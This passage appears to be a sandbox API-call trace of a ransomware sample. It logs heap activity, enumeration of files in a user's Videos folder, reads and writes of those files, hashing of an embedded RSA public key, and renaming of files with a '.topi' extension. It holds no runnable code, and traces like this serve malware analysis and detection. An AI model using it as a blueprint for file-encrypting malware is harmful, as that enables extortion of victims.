[0097.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4dc0 [0097.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0097.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4dd8 [0097.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4da8 [0097.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4df0 [0097.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e49d0 [0097.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0097.320] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.320] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.320] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0097.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4dc0 [0097.320] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.320] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.320] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.320] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.320] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.320] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0097.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.320] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4df0 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dd8 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4da8 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d90 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fb3c8 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.322] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x9189, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x9189, lpOverlapped=0x0) returned 1 [0097.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.322] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x918e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.322] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.322] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.322] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.322] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.322] CloseHandle (hObject=0x6a8) returned 1 [0097.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311eae0 [0097.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8c0) returned 0x31cf750 [0097.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311eae0 | out: hHeap=0x680000) returned 1 [0097.324] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\h3S74ZRbutT-6st.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\igvwvbnsz\\h3s74zrbutt-6st.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\h3S74ZRbutT-6st.flv.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\igvwvbnsz\\h3s74zrbutt-6st.flv.topi")) returned 1 [0097.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.324] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x766b58 | out: hHeap=0x680000) returned 1 [0097.325] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa5680ad0, ftCreationTime.dwHighDateTime=0x1d5ba8a, ftLastAccessTime.dwLowDateTime=0x6fc9e450, ftLastAccessTime.dwHighDateTime=0x1d5b5c3, ftLastWriteTime.dwLowDateTime=0x6fc9e450, ftLastWriteTime.dwHighDateTime=0x1d5b5c3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LJBw4XnUu9Yf6R", cAlternateFileName="LJBW4X~1")) returned 1 [0097.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0097.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ee58 [0097.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0097.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ee58 | out: hHeap=0x680000) returned 1 [0097.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0097.326] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6db3e10, ftCreationTime.dwHighDateTime=0x1d5c51e, ftLastAccessTime.dwLowDateTime=0x4ca8f1e0, ftLastAccessTime.dwHighDateTime=0x1d5bf10, ftLastWriteTime.dwLowDateTime=0x4ca8f1e0, ftLastWriteTime.dwHighDateTime=0x1d5bf10, nFileSizeHigh=0x0, nFileSizeLow=0xaaf4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RLbbFrbGkwBtF.avi", cAlternateFileName="RLBBFR~1.AVI")) returned 1 [0097.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4680 [0097.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd6) returned 0x766b58 [0097.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4680 | out: hHeap=0x680000) returned 1 [0097.326] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\RLbbFrbGkwBtF.avi") returned=".avi" [0097.326] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\RLbbFrbGkwBtF.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\igvwvbnsz\\rlbbfrbgkwbtf.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.326] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=43764) returned 1 [0097.326] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.329] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xaace, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.329] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.330] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.330] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.330] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.330] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xaaf4, lpOverlapped=0x0) returned 1 [0097.330] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.330] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.330] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.330] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.331] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.331] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.331] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.331] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.331] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.331] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.331] GetLastError () returned 0x0 [0097.332] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.332] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.332] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.332] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.332] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.332] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.332] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xaaf0) returned 0x9a06a00 [0097.332] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.332] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb3c8 [0097.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d90 [0097.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb410 [0097.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4da8 [0097.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4dd8 [0097.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4df0 [0097.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.333] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dd8 | out: hHeap=0x680000) returned 1 [0097.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4df0 | out: hHeap=0x680000) returned 1 [0097.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0097.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4df0 [0097.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0097.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4dd8 [0097.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0097.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4df0 | out: hHeap=0x680000) returned 1 [0097.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: 